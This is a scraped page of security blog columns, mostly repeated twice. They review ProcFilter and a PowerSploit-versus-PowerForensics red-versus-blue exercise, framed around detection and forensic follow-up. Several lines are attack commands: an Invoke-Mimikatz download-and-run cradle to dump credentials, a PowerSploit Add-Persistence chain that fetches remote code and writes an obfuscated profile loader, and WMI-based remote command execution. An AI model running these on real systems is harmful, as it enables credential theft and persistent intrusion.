toolsmith #132 – The HELK vs APTSimulator – Part 2

Continuing where we left off in The HELK vs APTSimulator – Part 1, I will focus our attention on additional, useful HELK features to aid you in your threat hunting practice. HELK offers Apache Spark, GraphFrames, and Jupyter Notebooks &#… Continue reading toolsmith #132 – The HELK vs APTSimulator – Part 2

toolsmith #132 – The HELK vs APTSimulator – Part 2

Continuing where we left off in The HELK vs APTSimulator – Part 1, I will focus our attention on additional, useful HELK features to aid you in your threat hunting practice. HELK offers Apache Spark, GraphFrames, and Jupyter Notebooks  as par… Continue reading toolsmith #132 – The HELK vs APTSimulator – Part 2

toolsmith #131 – The HELK vs APTSimulator – Part 1

Ladies and gentlemen, for our main attraction, I give you…The HELK vs APTSimulator, in a Death Battle! The late, great Randy “Macho Man” Savage said many things in his day, in his own special way, but “Expect the unexpected in the kingdom of madness… Continue reading toolsmith #131 – The HELK vs APTSimulator – Part 1

toolsmith #131 – The HELK vs APTSimulator – Part 1

Ladies and gentlemen, for our main attraction, I give you…The HELK vs APTSimulator, in a Death Battle! The late, great Randy “Macho Man” Savage said many things in his day, in his own special way, but “Expect the unexpected in the kingdom of madness!… Continue reading toolsmith #131 – The HELK vs APTSimulator – Part 1

Toolsmith In-depth Analysis: ProcFilter – YARA-integrated Windows process denial framework

Note: Next month, toolsmith #120 will represent ten years of award winning security tools coverage. It’s been an amazing journey; I look to you, dear reader, for ideas on what tool you’d like to see me cover for the decade anniversary edition. Contact information at the end of this post.

Toolsmith #119 focuses on ProcFilter, a new project, just a month old as this is written, found on Github by one of my blue team members (shout-out to Ina). Brought to you by the GoDaddy Engineering crew, I see a lot of upside and potential in this project. Per it’s GitHub readme, ProcFilter is “a process filtering system for Windows with built-in YARA integration. YARA rules can be instrumented with custom meta tags that tailor its response to rule matches. It runs as a Windows service and is integrated with Microsoft’s ETW API, making results viewable in the Windows Event Log. Installation, activation, and removal can be done dynamically and do not require a reboot.”
Malware analysts can use ProcFilter to create YARA signatures to protect Windows environments against specific threats. It’s a lightweight, precise, targeted tool that does not include a large signature set. “ProcFilter is also intended for use in controlled analysis environments where custom plugins can perform artifact-specific actions.”
GoDaddy’s Emerson Wiley, the ProcFilter project lead provided me with valuable insight on the tool and its future.
“For us at GoDaddy the idea was to get YARA signatures deployed proactively. YARA has a lot of traction within the malware analysis community and its flexible nature makes it perfect for malware categorization. What ProcFilter brings to the table is the ability to get those signatures out there in a preventative fashion with minimal overhead. What we’re saying by making this project open source is, “This is interesting to us; if it’s interesting to you then lets work together and move it forward.”

Endpoint tools don’t typically provide openness, flexibility, and extensibility so those are other areas where ProcFilter stands out. I’m passionate about creating extensible software – if people have the opportunity to implement their own ideas it’s pretty much guaranteed that you’ll be blown away by what they create. With the core of the project trending towards stability we’re going to start focusing on building plugins that do unique and interesting things with process manipulation. We’re just starting to scratch the surface there and I look forward to what comes next.

Something I haven’t mentioned elsewhere is a desire to integrate support for Python or Lua plugins. This could provide security engineers a quick, easy way to react to process and thread events. There’s a testing branch with some of these features and we’ll see where it goes.”

Installation
ProcFilter integrates nicely with Git and Windows Event Logging to minimize the need for additional tools or infrastructure for rules deployment or results acquisition.

ProcFilter is a beta offering with lots of commits from Emerson. I grabbed the x64 release (debug available too) installer for the 1.0.0-beta.2 release. Installation was seamless and rapid. It runs as a service by default, you’ll see ProcFilter Service via the services.msc as follows.

ProcFilter Service

You’ll want to review, and likely modify, procfilter.ini as it lets you manage ProcFilter with flexible granularity.  You’ll be able to manage plugins, rules files, blocking, logging, and quarantine, as well as scanning parameters and white-listing.

ProcFilter Use
You can also work with ProcFilter interactively via the command prompt, again with impressive flexibility. A quick procfilter -status will advise you of your running state.

ProcFilter Service

Given that ProcFilter installs out of the gate with a lean rule set, I opted to grab a few additional rules for detection of my test scenario. There is one rule set built by Florian Roth (Neo23x0) that you may want to deploy situationally as it’s quite broad, but offers extensive and effective coverage. As my test scenario was specific to PowerShell-born attacks such as Invoke-Mimikatz, I zoomed in for a very specific rule set devised by the man himself, mimikatz creator Benjamin Delpy. Yes, he’s written very effective rules to detect his own craftsmanship. 

mimikatz power_pe_injection Yara rule

I opted to drop the rules in my master.yara file in the localrules directory, specifically here: C:\Program Files\ProcFilter\localrules\master.yara. I restarted the service and also ran procfilter -compile from the command line to ensure a clean rules build. Command-line options follow:

Command-line options

Attack
As noted in our May 2015 discussion of Rekall use for hunting in-memory adversaries, an attack such as IEX (New-Object Net.WebClient).DownloadString(‘http://is.gd/oeoFuI‘); Invoke-Mimikatz -DumpCreds should present a good opportunity for testing. Given the endless amount of red vs. blue PowerShell scenarios, this one lined up perfectly. Using a .NET webclient call, this expression grabs Invoke-Mimikatz.ps1 from @mattifestation‘s PowerSploit Github and runs it in memory.

Invoke-mimikatz

The attack didn’t get very far at all on Windows 10, by design, but that doesn’t mean we don’t want to detect such attempted abuses in our environment, even if unsuccessful.

Detect
You can use command-line options to sweep broadly or target a specific process. In this case, I was able to reasonably assert (good job, Russ) that the PowerShell process might be the culprit. Sheer genius, I know. 🙂

Suspect process

Running procfilter -memoryscan 10612 came through like a champ.

Command-line ProcFilter detection

The real upside of ProcFilter though is that it writes to the Windows Event Log, you just need to build a custom filter as described in the readme.
The result, as dictated in part by your procfilter.ini configuration should like something like the following, once you trigger an event that matches one of your Yara rules.

ProcFilter event log view

In closing

Great stuff from the GoDaddy Engineering team, I see significant promise in ProcFilter and really look forward to its continued support and development. Thanks to Emerson Wiley for all his great feedback.

Ping me via email or Twitter if you have questions: russ at holisticinfosec dot org or @holisticinfosec.
Cheers…until next time, for the big decade anniversary edition.

Continue reading Toolsmith In-depth Analysis: ProcFilter – YARA-integrated Windows process denial framework

Toolsmith In-depth Analysis: ProcFilter – YARA-integrated Windows process denial framework

Note: Next month, toolsmith #120 will represent ten years of award winning security tools coverage. It’s been an amazing journey; I look to you, dear reader, for ideas on what tool you’d like to see me cover for the decade anniversary edition. Contact information at the end of this post.

Toolsmith #119 focuses on ProcFilter, a new project, just a month old as this is written, found on Github by one of my blue team members (shout-out to Ina). Brought to you by the GoDaddy Engineering crew, I see a lot of upside and potential in this project. Per it’s GitHub readme, ProcFilter is “a process filtering system for Windows with built-in YARA integration. YARA rules can be instrumented with custom meta tags that tailor its response to rule matches. It runs as a Windows service and is integrated with Microsoft’s ETW API, making results viewable in the Windows Event Log. Installation, activation, and removal can be done dynamically and do not require a reboot.”
Malware analysts can use ProcFilter to create YARA signatures to protect Windows environments against specific threats. It’s a lightweight, precise, targeted tool that does not include a large signature set. “ProcFilter is also intended for use in controlled analysis environments where custom plugins can perform artifact-specific actions.”
GoDaddy’s Emerson Wiley, the ProcFilter project lead provided me with valuable insight on the tool and its future.
“For us at GoDaddy the idea was to get YARA signatures deployed proactively. YARA has a lot of traction within the malware analysis community and its flexible nature makes it perfect for malware categorization. What ProcFilter brings to the table is the ability to get those signatures out there in a preventative fashion with minimal overhead. What we’re saying by making this project open source is, “This is interesting to us; if it’s interesting to you then lets work together and move it forward.”

Endpoint tools don’t typically provide openness, flexibility, and extensibility so those are other areas where ProcFilter stands out. I’m passionate about creating extensible software – if people have the opportunity to implement their own ideas it’s pretty much guaranteed that you’ll be blown away by what they create. With the core of the project trending towards stability we’re going to start focusing on building plugins that do unique and interesting things with process manipulation. We’re just starting to scratch the surface there and I look forward to what comes next.

Something I haven’t mentioned elsewhere is a desire to integrate support for Python or Lua plugins. This could provide security engineers a quick, easy way to react to process and thread events. There’s a testing branch with some of these features and we’ll see where it goes.”

Installation
ProcFilter integrates nicely with Git and Windows Event Logging to minimize the need for additional tools or infrastructure for rules deployment or results acquisition.

ProcFilter is a beta offering with lots of commits from Emerson. I grabbed the x64 release (debug available too) installer for the 1.0.0-beta.2 release. Installation was seamless and rapid. It runs as a service by default, you’ll see ProcFilter Service via the services.msc as follows.

ProcFilter Service

You’ll want to review, and likely modify, procfilter.ini as it lets you manage ProcFilter with flexible granularity.  You’ll be able to manage plugins, rules files, blocking, logging, and quarantine, as well as scanning parameters and white-listing.

ProcFilter Use
You can also work with ProcFilter interactively via the command prompt, again with impressive flexibility. A quick procfilter -status will advise you of your running state.

ProcFilter Service

Given that ProcFilter installs out of the gate with a lean rule set, I opted to grab a few additional rules for detection of my test scenario. There is one rule set built by Florian Roth (Neo23x0) that you may want to deploy situationally as it’s quite broad, but offers extensive and effective coverage. As my test scenario was specific to PowerShell-born attacks such as Invoke-Mimikatz, I zoomed in for a very specific rule set devised by the man himself, mimikatz creator Benjamin Delpy. Yes, he’s written very effective rules to detect his own craftsmanship. 

mimikatz power_pe_injection Yara rule

I opted to drop the rules in my master.yara file in the localrules directory, specifically here: C:\Program Files\ProcFilter\localrules\master.yara. I restarted the service and also ran procfilter -compile from the command line to ensure a clean rules build. Command-line options follow:

Command-line options

Attack
As noted in our May 2015 discussion of Rekall use for hunting in-memory adversaries, an attack such as IEX (New-Object Net.WebClient).DownloadString(‘http://is.gd/oeoFuI‘); Invoke-Mimikatz -DumpCreds should present a good opportunity for testing. Given the endless amount of red vs. blue PowerShell scenarios, this one lined up perfectly. Using a .NET webclient call, this expression grabs Invoke-Mimikatz.ps1 from @mattifestation‘s PowerSploit Github and runs it in memory.

Invoke-mimikatz

The attack didn’t get very far at all on Windows 10, by design, but that doesn’t mean we don’t want to detect such attempted abuses in our environment, even if unsuccessful.

Detect
You can use command-line options to sweep broadly or target a specific process. In this case, I was able to reasonably assert (good job, Russ) that the PowerShell process might be the culprit. Sheer genius, I know. 🙂

Suspect process

Running procfilter -memoryscan 10612 came through like a champ.

Command-line ProcFilter detection

The real upside of ProcFilter though is that it writes to the Windows Event Log, you just need to build a custom filter as described in the readme.
The result, as dictated in part by your procfilter.ini configuration should like something like the following, once you trigger an event that matches one of your Yara rules.

ProcFilter event log view

In closing

Great stuff from the GoDaddy Engineering team, I see significant promise in ProcFilter and really look forward to its continued support and development. Thanks to Emerson Wiley for all his great feedback.

Ping me via email or Twitter if you have questions: russ at holisticinfosec dot org or @holisticinfosec.
Cheers…until next time, for the big decade anniversary edition.

Continue reading Toolsmith In-depth Analysis: ProcFilter – YARA-integrated Windows process denial framework

toolsmith #112: Red vs Blue – PowerSploit vs PowerForensics

Happy New Year and welcome to 2016!
When last we explored red team versus blue team tactics in May 2015, we utilized Invoke-Mimikatz, then reviewed and analyzed a victim with WinPmem and Rekall. The recent release of PowerSploit 3.0.0 on 18 DEC 2015 presents us with another opportunity to use PowerShell for a red team versus blue team discussion. This time its an all PowerShell scenario, thanks as well to PowerForensics.
Forget the old Apple pitch line: “There’s an app for that.” With so much PowerShell love, there’s a PowerShell script for that!
For the uninitiated, a description of each.
PowerSploit “is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.
PowerForensics “is a PowerShell digital forensics framework. It currently supports NTFS and is in the process of adding support for the ext4 file system.
Both are updated regularly and are GitHub projects subject to your feedback and contributions.
PowerSploit includes scripts that aid in antimalware bypasses, code execution, exfiltration, persistence, privilege escalation, reconnaissance, script modification, and general mayhem.
PowerForensics includes scripts the allow analysis of the boot sector, Windows artifacts, the Application Compatibility Cache, Windows Registry, as well as create forensic timelines. There are also Extended File System 4 (ext4) scripts as well as some utilities.

Credit where due, these two projects include some excellent developers, including Jared Atkinson, who leads PowerForensics but also contributes to PowerSploit. The PowerSploit team also includes Matt Graeber and Joe Bialek, I’ve admired their work and skill set for years.
We won’t explore it here, but be sure to check out Empire from Will Schroeder, who also contributes to PowerSploit. The topic of a future toolsmith, “Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture.

Before working through a couple of red vs. blue scenarios, a quick rundown on installation for both tool sets.
For PowerSploit, use Download Zip from the Github repo, move the zip package to your \Documents\WindowsPowerShell\Modules path under your user directory, unpack it, and rename PowerSploit-master to PowerSploit. From an administrator PowerShell prompt, run Import-Module PowerSploit and follow it with Get-Command -Module PowerSploit to ensure proper import.
You will definitely want to run $Env:PSModulePath.Split(‘;’) | % { if ( Test-Path (Join-Path $_ PowerSploit) ) {Get-ChildItem $_ -Recurse | Unblock-File} } to avoid the incredibly annoying “Do you really want to run scripts downloaded from the Internet” warning. Yes, I really do.
For PowerForensics, the routine is similar, however the modules for PowerForensics are buried a bit deeper in the ZIP package. Again, use Download Zip from the Github repo, unpack the ZIP, drill down to \PowerForensics-master\PowerForensics\Module and copy the PowerForensics directory there to your \Documents\WindowsPowerShell\Modules path.
Issue Get-Module -ListAvailable -Name PowerForensics, them Import-Module PowerForensics. Again, Get-Command -Module PowerForensics will ensure a clean import and show you available modules. Likely worth adding $Env:PSModulePath.Split(‘;’) | % { if ( Test-Path (Join-Path $_ PowerForensics) ) {Get-ChildItem $_ -Recurse | Unblock-File} } to avoid hassles as well.

Let’s begin with my absolute favorite, it is the ultimate in absolute nerd humor and is a force to be reckoned with all by itself. Imagine a red team engagement where you’ve pwned the entire environment, then you leave the following calling card.
If you run Get-Help Add-Persistence -examples you will discover the best infosec joke ever, forget just PowerShell. I’ll modify Example 2 for our red vs. blue purposes, but the net result is unforgettable. From a PowerShell prompt:

  1. $Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }
  2. $ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
  3. $UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
  4. Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\rr.ps1
Three files are written: Persistence.ps1RemovePersistence.ps1, and rr.ps1 which is EncodedPersistence.ps1 renamed. Inspecting rr.ps1 reveals base64 encoding designed to conceal the 80’s musical flashback that follows.
User-level and elevated persistent scheduled tasks are created, called TN Updater, and a profile.ps1 file is written to C:\Users\\Documents\WindowsPowerShell. If you inspect the profile script, you’ll initially say to yourself “Whatever, the file is empty.” Au contraire, ami. Scroll right. Ah there it is: sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(‘U8hMrVDQyCwvUsgoKSmw0tdPyizRy6nUTzXwLbcsV9BUAAA=’),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()
Should your victim, or you on behalf of your victim, run .\rr.ps1, a few pleasantries ensue. Every time the victim system goes idle or the user invokes a PowerShell prompt, oh yeah baby, Rick Astley, Never Gonna Give You Up. Er, more specifically, Rick ASCII. Thank you, Lee Holmes, really.
All good chuckles aside, a persistent rickroll is really just an example of any number of truly evil options. Shells, beacons, downloaders all come to mind, creativity is really your only challenge, Add-Persistence is your vehicle for scripting forget-me-not. All good for the red teamers, what’s there for the blue team?    
PowerForensics Get-ForensicTimeline is likely a good start,  I’m a huge fan of a complete timeline. When you run Get-Help Get-ForensicTimeline you’ll quickly learn that it incorporates the following cmdlets:
  • Get-ForensicScheduledJob
  • Get-ForensicShellLink
  • Get-ForensicUsnJrnl
  • Get-ForensicEventLog
  • Get-ForensicRegistryKey
Get-ForensicTimeline left unchecked will, of course, dump a timeline for the entire discernible date range of all artifacts. This can lead to an unwieldy, huge text dump, I suggest filtering up front. Assume as a blue team member I knew my “attack” had occurred sometime during the New Year holiday. As such, I ran Get-ForensicTimeline | Sort-Object -Property Date | Where-Object { $_.Date -ge “12/30/2015” -and $_.Date -le “01/04/2016” } > c:\tmp\timeline2.txt.
This resulted in a much more manageable file for indicator searches. In this case, we’d like to attribute detail to the creation and execution of rr.ps1. There are a couple of ways to dig in here. SLS, alias for Select-String is your PowerShell friend: sls rr.ps1 .\timeline2.txt -AllMatches.
Always remember your trusty text editor as well. Even though I pre-filtered by date range, 010 Editor was able to easily process the full timeline as it handles large files quite well.
You can see we’ve easily discovered who, what, and where. The why is easy, because rickrolls rule! 🙂
Timeline analysis is always vital and important but there are more opportunities here, let’s put these kits through their paces for a second scenario.
PowerSpoit includes Invoke-WmiCommand. Per its description, Invoke-WmiCommand “executes a PowerShell ScriptBlock on a target computer using WMI as a pure C2 channel. It does this by using the StdRegProv WMI registry provider methods to store a payload into a registry value. The command is then executed on the victim system and the output is stored in another registry value that is then retrieved remotely.”
Easy enough, I used one of the example against one of my servers as follows:
Invoke-WmiCommand -Payload { 1+3+2+1+1 } -RegistryHive HKEY_LOCAL_MACHINE -RegistryKeyPath ‘SOFTWARE\pwnkey’ -RegistryPayloadValueName ‘pwnage’ -RegistryResultValueName ‘pwnresults’ -ComputerName ‘10.120.175.122’ -Credential ‘DOMAIN\username’ -Verbose
I changed my domain and username to DOMAIN\username for the example, obviously you’ll use your known good credentials. Results follow.
The payload here is simple math, 1+3+2+1+1, as executed on my victim server (10.120.175.122) and returned the result (8) to my attacker host. You can imagine how useful quick, easy remote WMI calls might be for a red team. Obviously a more constructive (destructive?) payload would be in order. But how to spot this from the blue team’s perspective?
PowerForensics includes Get-ForensicEventLog.  
Registry tweaks create Windows Security event log entries, including  4656 for registry key open, 4657 for creation, modification and deletion of registry values, and 4658 for registry key closed.
Imagine a security event log export file from a victim system, ready for analysis on your forensic workstation. As such, you could run the likes of Get-ForensicEventLog -path C:\tmp\security.evtx | Where-Object { $_.EventData -like “EventId: 4656” }.
See? That’s not so bad, right? Red team events do not need to leave the blue team scrambling to catch up. Similar tactics but different outcomes. 
I’ve done neither of these PowerShell infosec offerings any real justice, but hopefully opened your eyes to the options and opportunities the represent. Use them both and you’ll be better for it.
Conduct your red vs. blue exercises in concert, cooperatively, and you’ll achieve improved outcomes. Emulate that adversary, then hunt him down.
Follow these guys on Twitter if you want to stay up on the PowerShell arms race. 🙂
Ping me via email or Twitter if you have questions: russ at holisticinfosec dot org or @holisticinfosec.
Cheers…until next month.

Continue reading toolsmith #112: Red vs Blue – PowerSploit vs PowerForensics

toolsmith #112: Red vs Blue – PowerSploit vs PowerForensics

Happy New Year and welcome to 2016!
When last we explored red team versus blue team tactics in May 2015, we utilized Invoke-Mimikatz, then reviewed and analyzed a victim with WinPmem and Rekall. The recent release of PowerSploit 3.0.0 on 18 DEC 2015 presents us with another opportunity to use PowerShell for a red team versus blue team discussion. This time its an all PowerShell scenario, thanks as well to PowerForensics.
Forget the old Apple pitch line: “There’s an app for that.” With so much PowerShell love, there’s a PowerShell script for that!
For the uninitiated, a description of each.
PowerSploit “is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.
PowerForensics “is a PowerShell digital forensics framework. It currently supports NTFS and is in the process of adding support for the ext4 file system.
Both are updated regularly and are GitHub projects subject to your feedback and contributions.
PowerSploit includes scripts that aid in antimalware bypasses, code execution, exfiltration, persistence, privilege escalation, reconnaissance, script modification, and general mayhem.
PowerForensics includes scripts the allow analysis of the boot sector, Windows artifacts, the Application Compatibility Cache, Windows Registry, as well as create forensic timelines. There are also Extended File System 4 (ext4) scripts as well as some utilities.

Credit where due, these two projects include some excellent developers, including Jared Atkinson, who leads PowerForensics but also contributes to PowerSploit. The PowerSploit team also includes Matt Graeber and Joe Bialek, I’ve admired their work and skill set for years.
We won’t explore it here, but be sure to check out Empire from Will Schroeder, who also contributes to PowerSploit. The topic of a future toolsmith, “Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture.

Before working through a couple of red vs. blue scenarios, a quick rundown on installation for both tool sets.
For PowerSploit, use Download Zip from the Github repo, move the zip package to your DocumentsWindowsPowerShellModules path under your user directory, unpack it, and rename PowerSploit-master to PowerSploit. From an administrator PowerShell prompt, run Import-Module PowerSploit and follow it with Get-Command -Module PowerSploit to ensure proper import.
You will definitely want to run $Env:PSModulePath.Split(‘;’) | % { if ( Test-Path (Join-Path $_ PowerSploit) ) {Get-ChildItem $_ -Recurse | Unblock-File} } to avoid the incredibly annoying “Do you really want to run scripts downloaded from the Internet” warning. Yes, I really do.
For PowerForensics, the routine is similar, however the modules for PowerForensics are buried a bit deeper in the ZIP package. Again, use Download Zip from the Github repo, unpack the ZIP, drill down to PowerForensics-masterPowerForensicsModule and copy the PowerForensics directory there to your DocumentsWindowsPowerShellModules path.
Issue Get-Module -ListAvailable -Name PowerForensics, them Import-Module PowerForensics. Again, Get-Command -Module PowerForensics will ensure a clean import and show you available modules. Likely worth adding $Env:PSModulePath.Split(‘;’) | % { if ( Test-Path (Join-Path $_ PowerForensics) ) {Get-ChildItem $_ -Recurse | Unblock-File} } to avoid hassles as well.

Let’s begin with my absolute favorite, it is the ultimate in absolute nerd humor and is a force to be reckoned with all by itself. Imagine a red team engagement where you’ve pwned the entire environment, then you leave the following calling card.
If you run Get-Help Add-Persistence -examples you will discover the best infosec joke ever, forget just PowerShell. I’ll modify Example 2 for our red vs. blue purposes, but the net result is unforgettable. From a PowerShell prompt:

  1. $Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }
  2. $ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
  3. $UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
  4. Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .rr.ps1
Three files are written: Persistence.ps1RemovePersistence.ps1, and rr.ps1 which is EncodedPersistence.ps1 renamed. Inspecting rr.ps1 reveals base64 encoding designed to conceal the 80’s musical flashback that follows.
User-level and elevated persistent scheduled tasks are created, called TN Updater, and a profile.ps1 file is written to C:UsersDocumentsWindowsPowerShell. If you inspect the profile script, you’ll initially say to yourself “Whatever, the file is empty.” Au contraire, ami. Scroll right. Ah there it is: sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(‘U8hMrVDQyCwvUsgoKSmw0tdPyizRy6nUTzXwLbcsV9BUAAA=’),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()
Should your victim, or you on behalf of your victim, run .rr.ps1, a few pleasantries ensue. Every time the victim system goes idle or the user invokes a PowerShell prompt, oh yeah baby, Rick Astley, Never Gonna Give You Up. Er, more specifically, Rick ASCII. Thank you, Lee Holmes, really.
All good chuckles aside, a persistent rickroll is really just an example of any number of truly evil options. Shells, beacons, downloaders all come to mind, creativity is really your only challenge, Add-Persistence is your vehicle for scripting forget-me-not. All good for the red teamers, what’s there for the blue team?    
PowerForensics Get-ForensicTimeline is likely a good start,  I’m a huge fan of a complete timeline. When you run Get-Help Get-ForensicTimeline you’ll quickly learn that it incorporates the following cmdlets:
  • Get-ForensicScheduledJob
  • Get-ForensicShellLink
  • Get-ForensicUsnJrnl
  • Get-ForensicEventLog
  • Get-ForensicRegistryKey
Get-ForensicTimeline left unchecked will, of course, dump a timeline for the entire discernible date range of all artifacts. This can lead to an unwieldy, huge text dump, I suggest filtering up front. Assume as a blue team member I knew my “attack” had occurred sometime during the New Year holiday. As such, I ran Get-ForensicTimeline | Sort-Object -Property Date | Where-Object { $_.Date -ge “12/30/2015” -and $_.Date -le “01/04/2016” } > c:tmptimeline2.txt.
This resulted in a much more manageable file for indicator searches. In this case, we’d like to attribute detail to the creation and execution of rr.ps1. There are a couple of ways to dig in here. SLS, alias for Select-String is your PowerShell friend: sls rr.ps1 .timeline2.txt -AllMatches.
Always remember your trusty text editor as well. Even though I pre-filtered by date range, 010 Editor was able to easily process the full timeline as it handles large files quite well.
You can see we’ve easily discovered who, what, and where. The why is easy, because rickrolls rule! 🙂
Timeline analysis is always vital and important but there are more opportunities here, let’s put these kits through their paces for a second scenario.
PowerSpoit includes Invoke-WmiCommand. Per its description, Invoke-WmiCommand “executes a PowerShell ScriptBlock on a target computer using WMI as a pure C2 channel. It does this by using the StdRegProv WMI registry provider methods to store a payload into a registry value. The command is then executed on the victim system and the output is stored in another registry value that is then retrieved remotely.”
Easy enough, I used one of the example against one of my servers as follows:
Invoke-WmiCommand -Payload { 1+3+2+1+1 } -RegistryHive HKEY_LOCAL_MACHINE -RegistryKeyPath ‘SOFTWAREpwnkey’ -RegistryPayloadValueName ‘pwnage’ -RegistryResultValueName ‘pwnresults’ -ComputerName ‘10.120.175.122’ -Credential ‘DOMAINusername’ -Verbose
I changed my domain and username to DOMAINusername for the example, obviously you’ll use your known good credentials. Results follow.
The payload here is simple math, 1+3+2+1+1, as executed on my victim server (10.120.175.122) and returned the result (8) to my attacker host. You can imagine how useful quick, easy remote WMI calls might be for a red team. Obviously a more constructive (destructive?) payload would be in order. But how to spot this from the blue team’s perspective?
PowerForensics includes Get-ForensicEventLog.  
Registry tweaks create Windows Security event log entries, including  4656 for registry key open, 4657 for creation, modification and deletion of registry values, and 4658 for registry key closed.
Imagine a security event log export file from a victim system, ready for analysis on your forensic workstation. As such, you could run the likes of Get-ForensicEventLog -path C:tmpsecurity.evtx | Where-Object { $_.EventData -like “EventId: 4656” }.
See? That’s not so bad, right? Red team events do not need to leave the blue team scrambling to catch up. Similar tactics but different outcomes. 
I’ve done neither of these PowerShell infosec offerings any real justice, but hopefully opened your eyes to the options and opportunities the represent. Use them both and you’ll be better for it.
Conduct your red vs. blue exercises in concert, cooperatively, and you’ll achieve improved outcomes. Emulate that adversary, then hunt him down.
Follow these guys on Twitter if you want to stay up on the PowerShell arms race. 🙂
Ping me via email or Twitter if you have questions: russ at holisticinfosec dot org or @holisticinfosec.
Cheers…until next month.

Continue reading toolsmith #112: Red vs Blue – PowerSploit vs PowerForensics